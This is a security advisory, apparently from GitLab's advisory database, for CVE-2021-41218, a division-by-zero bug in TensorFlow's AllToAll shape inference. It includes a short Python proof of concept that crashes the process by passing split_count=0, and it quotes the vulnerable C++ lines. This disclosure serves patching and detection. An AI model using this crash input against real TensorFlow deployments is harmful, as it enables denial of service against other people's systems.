CVE-2021-41218: Integer division by 0 in `tf.raw_ops.AllToAll`
(updated )
The shape inference code for AllToAll can be made to execute a division by 0:
import tensorflow as tf
@tf.function
def func():
return tf.raw_ops.AllToAll(
input=[0.0, 0.1652, 0.6543],
group_assignment=[1, -1],
concat_dimension=0,
split_dimension=0,
split_count=0)
func()
This occurs whenever the split_count argument is 0:
TF_RETURN_IF_ERROR(c->GetAttr("split_count", &split_count));
...
for (int32_t i = 0; i < rank; ++i) {
...
dims[i] = c->MakeDim(c->Value(dims[i]) / split_count);
...
}
References
- github.com/advisories/GHSA-9crf-c6qr-r273
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2021-627.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2021-825.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2021-410.yaml
- github.com/tensorflow/tensorflow
- github.com/tensorflow/tensorflow/commit/a8ad3e5e79c75f36edb81e0ba3f3c0c5442aeddc
- github.com/tensorflow/tensorflow/security/advisories/GHSA-9crf-c6qr-r273
- nvd.nist.gov/vuln/detail/CVE-2021-41218
Detect and mitigate CVE-2021-41218 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →